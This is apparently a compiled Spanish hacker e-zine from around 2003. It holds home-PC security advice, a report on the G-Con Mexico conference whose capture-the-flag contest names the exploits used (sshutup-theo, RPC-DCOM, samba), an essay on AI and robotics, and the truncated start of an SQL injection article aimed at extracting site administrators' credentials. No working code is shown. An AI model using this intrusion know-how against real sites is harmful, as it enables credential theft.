Ya sabemos que hacer una copia de seguridad se torna como una perdida de tiempo o falta de ganas
pero al fin y al acabo ser nuestra nica salvacin despus de perder todo. Antes de largarnos a hacer
un Backup debemos estar seguros de cmo se realiza y no hacerlo sin conocimientos.

Les recomiendo tenerlo en un CD, disco ZIP, y si tienes problemas con esto, existen herramientas las
cuales hacen una copia de seguridad del sistema...

Ac les dejo algunas herramientas que puedes servirles para esta labor.

Backup Plus 7.1.1 http://www.backupplus.net/bkplus.exe

Pagi n a s Web malicios a s :

Existen?, la mera verdad es que si, hoy en da todo lo que circula en la red puede ser peligroso y muy
daino para nuestro servidor- ordenador.

En Internet circulan Webs con contenido malicioso, quiero decir que mediante la visita de una pgina,
podemos quedar infectados de virus, no quedaramos infectados si tenemos un antivirus y siguieran los
consejos hablados antes.

Generalmente los lenguajes utilizados para esto son el JavaScript, Java y ActiveX, tenemos la
posibilidad de desactivarlos, pero tendramos problemas para navegar algunas Web que requieren esto.

Les recomiendo que naveguen por paginas confiables y no de dudoso origen, aunque tambin es difcil
lograr esto, ya que existen herramientas y documentos que ensean a crear una Web con contenido
malicioso y seguramente muchas personas estn probando estas tcnicas, la red es una gran tela de
araa donde puedes quedar atrapado rpidamente si no estas al da con la seguridad, una vez mas te
digo que tengas el antivirus actualizado, te ahorraras muchos dolores de cabeza. Estas pginas con solo
visitarlas te infectan y quizs ni te des cuenta. Lo hacen descargando cdigo que el browser primero:
deja descargar por creer confiable y segundo: ejecuta y sigue lo que le ordena el cdigo. Es as como el
explorador de Microzoft cae muy fcil entre cdigo malicioso, si no esta bien configurado.

Spyw ar e s & Spam:

El spam es algo que nosotros no tenemos por qu soportar, pero por ahora no hay muchas posibilidades
de eludir a todos estos mensajes que lo nico que hacen es llenar nuestra casilla de correo y
molestarnos, generalmente llegan a nuestro correo por medio de webs que al visitarlas,
inmediata mente toman algunos datos personales y despus nos mandan correos, supuestamente con
las cosas que nos gustan, si no entienden, un ejemplo es que, nosotros entramos a una Web de autos,
registramos y al otro da nos cargan con mail sobre temas que nosotros nunca pedimos.

Otra cosa son los spywares que aunque no son tan peligrosos o molestos no tienen por que estar dentro
de nuestro ordenador, comnmente conocidos como programas espas, estas utilidades no son
instaladas por otras personas accediendo a nuestro PC, si no que al instalar un programa, no sabemos
si tambin se instala un spyware. Estas herramientas sirven para mandar informacin nuestra a
empresas las cuales dicen que sirven para saber las preferencias de los usuarios, as despus
encontramos correos donde nos ofrecen productos que nosotros nunca pedimos, si nos ponemos a
pensar, esto se transforma claramente en spam.
Para que tengan una idea de la informacin que pueden obtener las empresas al instalar spyware en tu
ordenador les dejo algo para que vean:

Tu direccin IP
Banners a lo que haces clic cuando te conectas
Numero de telfono que usas para conectarte a Inet
Publicidad que aparece sin visitar paginas
Etc...

Lo hacen modificando el registro o ejecutando un script, para que se abran programas que descargan
publicidad, o suben hacia sus servidores informacin tuya, entre otras cosas.

Para tratar de parar estas molestias, puedes descargar programas que te den la posibilidad de borrar
toda esa basura y eliminar completamente el spyware.

SpyBot
Ad-Aware

Todo esto es ilegal, sabemos que recibimos ofertas sobre productos que nosotros nunca pedimos, estas
compaas sern multadas y ya ha empezado la guerra contra el spam.

Virus:

Estuvimos hablando y tratando el tema de virus ms arriba, pero ahora les dejare bien lo que pueden
lograr estos especimenes.

En tu ordenador tienes documentos de la universidad, colegio, trabajo, tambin tenes fotos, mp3 que te
costaron conseguir y cientos de cosas que pueden ser valiosas para un usuario de hogar, si no tenemos
nada de lo que se trato antes den por seguro que si te infecta un virus informtico potente, da por
perdido todo o la mayora de las cosas, todo lo que tenias se te fue y tendrs que empezar de cero.

Tengan por entendido que tambin hago relacin a los troyanos, sniffer, etc. Un virus infecta el sistema
y trata de borrar todo lo que encuentr a a su paso, tambin puede cambiar la configuracin del
antivirus, firewall, etc.

Como sabemos estos bichos (virus) han mejorado sus tcnicas para auto- replicarse, tambin para que
no los detecten los mejores antivirus y hasta para engaar al usuario.

Para poder mantenernos seguros, descarga un antivirus, actualzalo y piensa bien las cosas que
descargas de inet.

Progra m a s de encrip ta c i n:

Estamos en una parte donde hablare sobre por qu mantener nuestros datos cifrados, y de forma
segura.

Los programas de encriptacin son de un gran uso ya que nos dan la posibilidad de proteger nuestros
datos y mantenerlos de forma que nadie pueda tener acceso sin la clave del programa que descifra los
archivos.

Por ejemplo, si contamos con las claves de cuentas de correo en Yahoo y Hotmail, claves de pop3, ftp,
inet, numero de tarjeta de crdito, etc. en un archivo .txt (seguramente muchos de ustedes lo tengan
as, si olvidas la contrasea recurres al archivo que creaste con todos esos datos), no crees que si un
intruso tiene acceso a ese archivo, perderas todo?, pues la manera de arreglar esto, es adquiriendo un
programa que te encripte los datos, por ejemplo un programa de estos te encriptaria as este dato:

(Encriptado)

lnpVk Q_(_#-
}A\y,/_L_$(9+Z66_F@jV_D8i,y~_bX /[fccmw0_TE
9R_z_Mb y&ital

(Archivo normal)

Ftp: 43678cdt
Inet: contraseacdt23454
Web: cdtweb5612
Tarjeta de crdito: 4512908378248
Telfono: 422222
Nombre: Prez digita

Como ven, es un mtodo bastante seguro para mantener nuestro ordenador y archivos fuera de
alcance... les dejo algunos para descargar:

http://www.softstack.com/download/fileprot.zip

Easy File Protector es un programa el cual nos brinda la opcin de restringir el acceso a cualquier
archivo mediante una contrasea, tambin la de una carpeta. Da la posibilidad de que no puedan
mover el archivo o carpeta y tampoco borrarlos.

http://www.gregorybraun.com/BLOWFISH.ZIP

BlowFish es un programa de encriptacin de archivos mediante contrasea.

http://pwd2k.com/downloads/p2k280.exe

Este programa puede crear claves seguras, encripta tus archivos, y tiene distintas utilidades, como
guardar los password que tienes en la PC.

Otro tema si quieren estar seguros y que nadie pueda ver los mensajes, es utilizar PGP (Pretty Good
Privacy), este programa sirve para encriptar los mensajes que envas, o sea solo t y el que tenga la
passphrase (private key) o public key, es el que puede verlo. Lo pueden descargar de:
http://personales.jet.es/jm/soft/pgpa.exe.

Lista de correo:

Al vernos todos los das vulnerables, llenos de fallos nuevos que bajan el nivel de seguridad en nuestro
ordenador, existen listas de correo donde informan todos los das las fallas que salen, nos dan
informacin de las causas que puede llegar a tener esa falla y varios enlaces para mas informacin, a
su vez nos dan el link a la pagina donde ofrecen el parche para arreglar el fallo.

Es algo til como vemos y estaremos alertas a las ultimas fallas que tiene nuestro ordenador, les
recomiendo estar anotados en estos servicios, uno de los mas conocidos es http://www.hispasec.com/ nos
da mucha ayuda con sus informes pero no se limiten solo a una, busquen ms en la red, que
encontrar n.

Enlace s de inter s:

http://www.hispasec.com/
Pagina que nos brinda informes sobre fallos Bugs/Exploits

http://www.hispabyte.com/
Muy buena pagina, tiene gran cantidad de documentacin, y da la posibilidad de chequear online
nuestro ordenador.

http://www.lcu.com.ar/
Foro sobre distintos temas de informtica, visita la parte de seguridad.
http://www.datafull.com/
En esta Web encontrar as gran cantidad de software, desde programas para encriptar, firewalls,
antivirus, etc.

Tienes para probar todo lo que quieras y quedarte con el que mejor te guste.

Cerebro + neuron a s:

Para lograr todo esto (que es lo mnimo para mantener nuestro ordenador a salvo) no debes ser un
genio informtico, solo debes pensar en como mantener alejados a los intrusos, este texto te ayudara a
empezar, pero nunca te quedes con esto de informacin, busca y encontraras de todo para mantenerte
seguro, recordemos como hacer:

Un firewall bien configurado


Antivirus actualizado si puedes semanalmente o seguido
Programas de encriptacin para mantener los datos seguros

Estar informado para saber de los ltimos fallos y parches


Hacer un respaldo del disco por las dudas que no sirvan nuestras tcnicas y logren acceso
Pensar un poco antes de descargar cosas de un sitio que no este seguro, a su vez descarga de
archivos adjuntos del correo.

Probar tu orden a d or:

La manera mas fcil de saber que tan seguro estas, es atacando tu propio ordenador, empieza por darle
un escano para ver que puertos tienes abiertos, si tienes bugs, prueba en scanners online que ofrecen
muchas Web, prueban tu firewall, tu antivirus, y chequean si el sistema esta libre de troyanos, etc,
buena idea para empezar... Acurdate de empezar por las cosas pequeas para tener un sistema
completo. Esto te servir para cerrar posibles entradas indeseadas.

No alcanz a:

Ya estoy llegando al final de este texto de seguridad casera y la verdad es que todo esto y ms, no
alcanza para mantenernos %100 seguros, para decir todo enserio, estamos muy lejos de lograr
mantener nos seguros, es verdad que le haremos el camino mas difcil al intruso para que acceda a
nuestro ordenador, pero si un atacante quiere acceder tengan por seguro que tarde o temprano
encontrara la forma de hacerlo.

Lo nico que les digo es que sean un poco ms responsables para mantener la seguridad en
sus ordenadores y no lo hagan ms fcil de lo que es...

Quizs muchos de ustedes piensen que no sirve de nada este texto, sepan que muchos recin empiezan
y no estn al tanto de todo, es mas, hay profesionales y muchos los cuales no tienen idea de como
administra r un ordenador, imagnense esos mismos (y si que los hay) administra ndo una red en una
empresa, es por eso que hago este texto para personas que tienen dudas de cmo proteger su
ordenador.

Otro de los problemas de seguridad en un usuario de hogar es la utilizacin de Internet Explorer, este
navegador tiene cientos de fallas, por lo que les recomiendo que prueben otros navegadores como
Opera, realmente es rpido y confiable, tambin no se queden colgados con el Outlook, prueben otros
programas, no solo existe Microsoft.

Desp e d i d a:

Ahora si llegamos al final de todo esto, espero que les sirva a los usuarios de Windows y que
se mantengan al tanto sobre seguridad Una vez ms me despido hasta la prxima...

Bytex
LeOn177 Seguridad total, no lo creo.
Una mirada al G-Con Mxico
Por: darko
Mail de contacto: velaps [email protected]

Qu es G-con?
Es un congreso que se realiza cada ao en la Ciudad de Mxico, en el cual asiste gente muy conocida en
el underground (me refiero a los ponentes), para exponer temas como seguridad en servidores, redes
GSM, ingeniera inversa, como escribir (crear) nuestros propios exploits, etc.
Esta es la segunda vez que se realiza el congreso, el primero, fue el pasado Diciembre de 2002, en esta
ocasin el G-con two fue en Octubre del 2003, teniendo como sede el Centro Exhibimex, el congreso es
organizado por la empresa Kelsisiler y Kaspersky Lab, bueno les contare otro poco sobre el congreso.
Este ao, al igual que el anterior, contando con gente especialista en la materia, las conferencias
dirigida tanto a linux/unix como a windows (una que otra), fueron muy interesantes, aunque haba
algunas de nivel muy avanzado, y otras de nivel medio, en fin, haba para todo publico. Algunas de las
ponencias (con sus respectivos ponentes) que se pudieron observar durante el congreso fueron:

Ponencias Ponentes

Gr Security kernel patches Spender


The Design and Implementation of MOSDEF, a post-exploitation compiler suite Dave Aitel
Reverse engineering under UNIX and win32 Anakata
Lea: Design, Implementation and altivec cryptographic implementations Edudardo ruiz
Advances in PalmOS viruses and PRC file infection TiagoAssumpcao
Advanced Polymorphic 'engines' theorical and practical analisis, Metamorphism Exponed Luis Castaeda
Fraude y Seguridad en GSM PaTa
Web security with open source software Sandino Araico
Hacker targeting, getting to your pray no matter what Dex & Nahual
La memoria fsica en el anlisis forense en linux Shadown
The Honeynet Project Gobbles
Common errors in malloc and multiple free() techniques Nicolas Waisman
LiquidFire - Becomming an OS Lucas Mendez
Linux Programming, from hello worlds to LKM Rommel Sanchez

G-Con Mxico http://www.g-con.org

El congreso no solo abarcaba ponencias, sino tambin algunos talleres, unos de stos fueron:

Writing reliable exploits,


How to implement your own encryption algorithm,
How to write viruses, Linux Programming, from hello worlds to LKM,
How to write your own OS.
Adems de que tambin se contaba con breaks, en donde gente del publico y/o integrantes de teams en
Mxico podan mencionar algunos proyectos, o dar alguna platica, hablar sobre la situacin del 'under'
en Mxico, que es la CUM (Comunidad Underground de Mxico), en fin, estaba el espacio abierto para
quien quisiera hablar.

Tambin se tenia planeado una serie de juegos como por ejemplo: 60 preguntas / 60 tequilas, el cual
consista en que si el participante contestaba bien a una pregunta, reciba un tequila de premio, pero
debido a razones desconocidas se cancel este juego.

Un evento al que mucha gente quera asistir y/o participar era el de Capture the Flag, en el cual se
pondran 6 maquinas victima para que fueran penetradas, y el que consiguiera tomar el control de la
ultima PC, tendra como premio una laptop, se darn detalles mas adelante sobre capture the flag.

Una de las ponencias en la cual mucha gente estaba interesada y creo que fue la que tuvo mayor
publico a pesar de ser la ultima conferencia del da, fue la de "Fraude y Seguridad en GSM" por PaTa,
durante la conferencia se comento que sta haba sido en parte censurada, ya que, un da antes, un
'reportero' de un peridico llamado El Independiente public una nota en la cual decan cosas que no
eran ciertas y confundan o describan las ponencias a su conveniencia, aqu pongo una parte de la nota
por la cual la ponencia de PaTa y una que otra, se vio afectada en el contenido, por cuestiones de
seguridad y por parte de los organizadores se prefiri censurar las ponencias.

"La Plaza Exhibimex de la ciudad de Mxico es el centro de operaciones de los expertos en seguridad
informtica que asisten al congreso internacional G-CON."

"Un adolescente demostrar con una pequea caja magntica que es posible bloquear las llamadas de
los celulares de los asistentes a su conferencia, se robar los mensajes contenidos en los aparatos y los
mandar al telfono que l elija."

"Otro de los ponentes entrar en los sitios web gubernamentales y de empresas bancarias, demostrar
lo fcil que es adulterar las bases de datos."

Es por estos comentarios que se vieron afectadas algunas ponencias, aqu les dejo el link sobre la nota
completa:

http://www.elindependiente.com.mx/articulos.php?id_sec=6&id_art=1743&id_ejemplar=

Esta foto es precisamente durante la conferencia de PaTa, en al cual esta describiendo Fraudes en
GSM, a lo cual dijo que, hasta el momento no se tenia conocimiento de como hacer fraude en GSM, o
llamar gratis, etc., tambin se reservo muchas preguntas que se le hicieron por parte del publico,
respondiendo que era 'informacin confidencial'.
Aqu se encuentr a describiendo la arquitectura de las redes GSM. La Mobile Station, Base station
Subsystem, Network management, Exchange System, Suscriber and Terminal Equipment databases.

Segn PaTa, en la historia de los telfonos mviles, solo se han visto afectados por el virus llamado
Timofonica Spanish, este virus era de 12kb, programado en Visual Basic, en la siguiente foto se puede
observar parte del cdigo del virus.
Las fotos que se pudieron tomar en el congreso fueron pocas, ya que, tuve problemas con la cmara,
otra ponencia en donde pude tomar algunas fotos fue en la de Gr Security por Spender, durante sta
sucedi algo muy chistoso, ya que empez la ponencia normalmente como todas, y cuando haban
transcurrido algo de tiempo se empez a escuchar msica y de repente salio una teibolera y empez a
bailar enfrente de Spender y obviamente todo el publico 'despert' al escuchar la msica y ver a la
teibolera, Spender sigui hablando pero despus, parte del staff de g-con comenz a quitar mesas y todo
el escenario, entonces empez la teibolera a bailarle en las piernas a Spender.
Como se puede observar en las fotos, Spender continuo con su ponencia, aunque la teibolera lo distraa
un poco, y claro, no se pudo resistir y termino con la teibolera xDDDD. Parte del staff de G-CON
coment que era una especie de broma, ya que vea a la gente aburrida, o no interesada en la ponencia,
pero que no era ninguna falta de respeto hacia el ponente, porque mas adelante se dara espacio para
volver al tema.

Durante los breaks que haban, se juntaban todos los ponentes de g-con a resolver dudas, responder
preguntas de cualquier tema, aqu podemos observar a Dave Aitel, Spender, Gobbles, knish y Luis
Castaeda (de derecha a izquierda).

La gente poda hacer todo tipo de preguntas sobre hack, crack, virii, etc., tambin poda preguntar
cosas personales como por ejemplo: donde trabaja, a que edad empez a utilizar una PC, etc... Los
ponentes nunca se mostraron arrogantes, al contrario, si ibas y les preguntabas algo ellos te
contestaban.

En los talleres al igual que en las ponencias haba de todos los niveles e idiomas, algunos eran en
espaol otros en ingles, pero coincidan con las ponencias en que ambos eran buenos. Los ponentes en
talleres te explicaban una vez y otra, hasta que entendieras, claro que para estos talleres se requera
tener como mnimo nociones de lenguaje C, ya que de lo contrario pues estabas perdido xDD.

Sobre el captur e the flag:

Es un concurso que se realiza entre los asistentes al congreso, consiste en penetra r 6 sistemas que ha
puesto el staff de g-con, al conseguir acceso al primer ordenador, pasara al segundo y as
sucesivamente hasta llegar al sexto ordenador, a lo cual lo convierte en el ganador y acreedor de una
laptop.

Por segundo ao consecutivo nadie fue capaz de penetrar todos los sistemas, a continuacin
se describen los ordenadores que estaban como victima.

El primer ordenador a penetra r era la maquina denominada [penetrame 1]:

OpenBSD 3.0. Vulnerable a ssh principalmente, la manera fcil de penetrarla era mediante el exploit
sshutup- theo.tgz. Al penetra rlo obtenas:

/root/flag1 = 49 52 41 20 49 52 41 20 4d 45 20 50 = IRA IRA ME P

El segundo ordenador era fcil de penetrar por el fallo RPC- DCOM de Windows 2000 Profesional.

Al penetra rlo obtenas:


/root/flag2 = c:\flag2 = 45 20 50 45 4e 45 54 41 53 54 45 53 20 = E PENETRASTES

El tercero era un fallo creado por g-con:


Al penetra rlo obtenas:
/root/flag3 = 4d 41 4e 54 4f = MANTO

El cuarto ordenador era simplemente el clsico fallo de samba, la exploit al penetra rlo obtenas:
/root/flag4 = 20 57 45 45 45 = WEEE

El quinto ordenador era un stack overflow creado por g-con:


Al penetra rlo obtenas:
/root/flag5 = 45 45 45 21b8 = EEE!.

El sexto ordenador "no era vulnerable a nada", el password lo obtenas de la maquina anterior.
Al "penetrarlo" obtenas:
/root/flag6 = 47 2d 43 4f 4e 20 53 45 43 55 52 49 54 59 20 32 20 59 4f 55 20 57 49 4e 20 3a 29 = G-CON
SECURITY 2 YOU WIN :)

Fuente acerca de CTP (capture the flag)


http://www.g-con.org

Como se podrn dar cuenta no comentare todas las ponencias, ya que ese no es el propsito de este txt
(bueno del todo), despus podrn descargar las ponencias formato .ppt desde el sitio de g-con.

Por mi parte es todo, espero que se den una idea de como estuvo el congreso, mucha gente de Mxico no
pudo asistir, en la mayora de ellos mucha gente que postea en CUM (www.hakim.ws/cum), aunque
hay que mencionar que asisti gente representa ndo a algunos teams aqu en Mxico, como es le caso de
hkm representando a hakim, napa representa ndo a hackersoft, vision, gente de vulnfactory, e incluso
un integrante de raza- mexicana (no me consta pero eso me comentaron *fuente muy buena*).

Fuente del articulo: http://www.g-con.org


Revoluci n Artificial
Por: LeOn177
Mail de contact o: piso [email protected]

Nax a todos ustedes, siempre CDT cumpliendo y enviando toda esta info por la red. Hoy les traigo un
tema que puede ser de inters para muchos de ustedes, el tema es Robots e Inteligencia artificial, si
bien no soy un experto en el tema voy a tratar de darles a conocer lo que se viene en el mundo de las
tecnologas, aparte se ha tratado poco y nada en el mbito informtico de esto...
Comencemos de una vez y a esperar el da que veamos computadores inteligentes.
Hemos llegado hasta esta instancia en la que despus de tanto cdigo binario, ordenadores, perifricos
y cables, logramos acercarnos a crear una maquina la cual tenga los medios para hacer cosas mejores
que las de un ser humano. Por eso YO voy a ponerle como nombre a este articulo: Revolucin Artificial.
Si nos vamos un poco a la historia podremos saber que en los aos 60 los expertos pensaban que
estaban cerca de crear un ordenador que fuera capas de pensar como un ser humano y tomar decisiones
por si mismo, pero estos expertos en inteligencia artificial estaban equivocados y no saban lo difcil
que era el proyecto. El trmino de Inteligencia Artificial podra decirse que es la inteligencia de un ser
humano transportada a un sistema computacional.
Los cientficos que estn trabajando en estos proyectos hoy en da, quieren lograr que las computadoras
puedan ser capaces de hacer acciones al igual que un ser humano. Todo esto naci en un principio
creando programas como juego de ajedrez o damas, donde el programa era capaz de derrotar a los
mejores jugadores del mundo, y as fueron evolucionando y extendindose las ideas de crear un
ordenador con inteligencia artificial...
Una persona que se hizo muchas veces la pregunta que si poda una maquina pensar, fue el reconocido
Alan Turing, un matem tico britnico, el cual estuvo en proyectos como el de descifrar cdigo alemn y
l fue quien escribi el libro On computable numbers, tambin podemos saber que l fue el primero en
disear una computadora electrnica digital.

La Inteligencia artificial esta dando pequeos pasos, un ejemplo puede ser la posibilidad de interactuar
con la maquina mediante un programa de texto, existen programas los cuales pueden hacerte
preguntas, responder, mostrar sentimientos, enojo, etc.
Se estn creando mas cosas, como autos que puedan dar un informe si algo esta daado, aparatos
inteligentes los cuales tengan que obedecer al dueo, etc...
Si quieren descargar un programa basado en estas cosas de como interactua r con el ordenador, pueden
hacerlo desde el sitio http://www.adictosnet.com.ar/lenguajea.htm
La gente que trabaja en esto, se pone un desafo alto, ya que estn creando un ordenador inteligente y
con capacidades humanas, si logran hacerlo, debemos preguntar nos que suceder con nosotros?, como
haremos para convivir con estas maquinas...
La inteligencia artificial como dije antes, esta avanzando en estos ltimos aos, gracias a los avances
tecnolgicos. Otra aplicacin de la inteligencia artificial, es la que va en ayuda del ser humano, en
personas con problemas motrices, por ejemplo....
Se estn creando maquinas donde puedan ayudar a personas con problemas visuales, estas maquinas
utilizan tecnologas OCR (optical character recognition) las cuales reconocen texto para despus
reproducirlo en forma de voz..

Ac voy a dar un ejemplo: el cerebro es mucho mejor que cientos de computadoras, por tareas como el
lenguaje, la visin, etc., pero para problemas de clculo es menos potente que un microprocesador de 4
bits.
Ya se estn llevando acabo en varios pases, la creacin de un ojo electrnico que pueda ayudar a
millones de personas ciegas o con problemas oculares, los pases mas avanzados en esta tecnologa son
los japoneses, belgas y americanos quienes estn diseando diferentes tcnicas, ingenieros americanos
han llevado un avance enorme al crear un ojo electrnico, el cual puede tener ms funciones que un ojo
humano, desde ver en cmara lenta, hasta poder ver en la oscuridad, todava esto no se a llevado acabo
al 100% ya que es un proyecto que esta en camino, pero los avances son valiosos, personas que no
tienen la posibilidad de ver, la tendrn, a travs de esta tecnologa.
Una de las ultimas noticias en el mbito tecnolgico es que otro grupo de ingenieros estadounidenses
podrn implantar un microchip, el cual estimula las clulas de un ojo humano que no estn daadas,
para mas informacin pueden visitar el siguiente link que habla del tema:
http://www.educared.net/primerasnoticias/hemero/2003/enero/cien/eye/eye.htm
Otro invento es la nariz electrnica la cual puede indicar el nivel de maduramiento de una fruta,
aromas de vinos, como la que crearon los espaoles. Tambin Argentina cre un dispositivo que si bien
no es tan avanzado, vale la pena comentar su desarrollo.

Estas aplicaciones llegan a superar la inteligencia humana, que quiero decir, pues que una maquina
puede lograr sacar problemas de calculo mucho mas rpido que una persona. A su vez en estos tiempos
las maquinas toman las tareas de las personas ya que no requieren un pago mensual y cometen mucho
menos errores que nosotros, solo necesitan un tcnico que revise a las maquinas (robots) para ver si
necesitan algo en sus circuitos, y alimentacin (energa).

Podemos decir que desde que se empez con el proyecto de la Inteligencia Artificial, han salido a la luz
muchas preguntas pero pocas respuestas, y para muchos es emocionante pero a la vez aterrador pensar
que una maquina pueda pensar.

En este tema se crea una gran curiosidad y a su vez se ven fracasos, uno de estos es un programa
creado para traducir frases, la maquina no logro entender la frase y dijo completamente otra cosa, se
debe a que trataba de traducir la frase sin comprenderla.

Ahora damos un salto a un tema ms conoci d o que es el de los robots:

Los robots tambin avanzan fuerte, estos pueden estar fabricando cosas las 24 horas del da durante
todo el ao, mejorar calidad del producto, mas productos, etc. La palabra robot surge de la traduccin
del checo robota, que significa trabajador forzado. En si, los robots son controlados por el ordenador que
le da rdenes especficas o tambin puede ser desde su microprocesador.

Como sabemos los robots no tienen forma de ser humano ya que estn diseados para trabajos
forzados, pero estos tienen el problema que estn limitados a sus programas que seria el software,
tambin no pueden diferenciar entre un animal de otro, para dar un ejemplo.

Podramos llamar poblacin de robots, ya que cada da mas salen a la luz y ocupan lugares de
personas, ellos pueden perforar algo con una exactitud perfecta, se ve en caso de operaciones a seres
humanos, y sabemos que hoy en da el robots vs el ser humano no queda duda de que servimos para
mas cosas nosotros, se debe a que el robot se programan con la inteligencia de muchas personas por as
decir, pero igual falta para que los robots puedan dominarnos, no se si ser en un tiempo lejano o corto
pero quien sabe que pasara. Para que entiendan mejor las mquinas estn muy por debajo del ser
humano ya que una persona puede solucionar todos los problemas que se les presente, en cambio una
maquina solo puede solucionar las cosas por la cual fue programada.

Gracias a los avances de la tecnologa podemos encontrar simuladores los cuales pueden reproducir un
vuelo de verdad, estos programas se crearon con el fin de abarata r los costos de combustible de un
avin, ya que, para que un piloto pueda aprender, deba volar en un avin vaci, sin pasajeros, pero
esto implicaba gastos, ahora con los simuladores, los pilotos logran capacitarse mejor para situaciones
de riesgo y todo parece real.

Lo que se ha hecho cabinas con movimientos, el desafi ahora es hacerlas completamente inteligentes,
que tengan la oportunidad de elegir sus acciones, otra de las cosas por la cual se esta desarrollando
esta materia, es que ayudaran mucho mas a los seres humanos, si ahora nos ayudan sin inteligencia
propia, imagnense con sus propios pensamientos.

Algunos enlace s de inter s podran ser:

http://www.lania.mx/spanish/actividades/newsletters/1997- otono-invierno/evolutiv.html
http://www.iespana.es/iabot/
http://cariari.ucr.ac.cr/~claudiog/Mente_conciencia_y_artificio.html
http://www.ia.uned.es/

Bueno ya termine con esto de inteligencia artificial, robots, etc. Espero que les haya dado una idea de
como esta avanzando la tecnologa hoy en da y que puedan informarse mucho mas sobre estos temas,
para la prxima edicin tendremos ms temas relacionados con la IA y la robtica.
SQL Injection 24V
Por: Kaskad e
Mail de contact o: kaskad e@infohc k e r.org

Introdu c c i n:

Bueno, este es mi primer documento relativo al Hacking, hace muy poco que estoy en este mundillo y
apenas estoy dando mis primeros pasos, pero creo preciso refundir varios textos hallados en Internet
acerca de SQL Injection para poder dar una visin ms global, sobretodo prctica y orientada a
resultados... Para ello emplear como excusa un par de webs que renen las caractersticas necesarias
para un ataque mediante SQL Injection y aprovechar las caractersticas de cada una de ellas para
enriquecer la casustica del mismo. Citar en primer lugar las fuentes de informacin y las premisas
en las que se basa esta tcnica para, posteriormente, adentra rme en la ejecucin del mismo. A la
finalizacin del documento expondr las conclusiones que se pueden extraer, recordando siempre que
dichas conclusiones estn basadas en estos casos en concreto pero entendiendo el comportamiento de
los mismos se puede extrapolar a cualesquiera otros casos afines.

Fuent e s:

http://www.ingeniova.es/seguridad/sqlinjection.htm
http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://developer.mimer.com/documenta tion/Mimer_SQL_Reference_Manual/Data_dic_views2.html
http://www.blackhat.com/presenta tions/win- usa- 01/Litchfield/BHWin01Litchfield.doc
http://www.nextgenss.com/papers/advanced_sql_injection.pdf (Recomendado)

Premi s a s:

La pgina debe de realizar consultas a una base de datos con el fin de visualizar resultados de la
misma, como parte de su funcionamiento normal. Bases de datos como Oracle, Access y MySQL
tambin se ven afectadas por esta vulnerabilidad, pero tambin as por su estructura en particular, y
su sintaxis con lo cual, si bien las ideas son las mismas, la forma de explotarlas puede variar
sustancialmente. En estos 2 casos veremos el ataque a bases de datos SQL Server bajo consultas
mediante ASP, no por nada en concreto, sino porque es el caso ms sencillo e ilustrativo.

La pgina tiene que tener algn tipo de autenticacin, nuestro objetivo ser la consecucin de users y
passes de la base de datos para poder entrar a la misma (preferentemente el user y pass del
administrador para poder operar con el mximo de privilegios).

Por ltimo tiene que ser vulnerable, esto es, permitirnos realizar consultas a la base de datos, as como
cualquier otra instruccin que le pudiramos pasar a cualquier base de datos mediante un cliente con
el que nos conectramos a ella. Una de las vulnerabilidades que ms facilita la labor (aunque no es ni
mucho menos indispensable) consiste en mostrar nos parte del query como resultado de un error en la
resolucin del mismo. Muchas veces esto solo sucede en uno de los 300 ASP de la pgina, por lo cual, la
parte ms complicada estar en torno a la bsqueda de ese ASP vulnerable. Solo queda citar que,
aunque hay muchos mtodos para colarse en uno de estos sistemas sin necesidad de password, muchos
estn hechos para no permitir este tipo de trucos. Yo me encaminar hacia una forma, creo que ms de
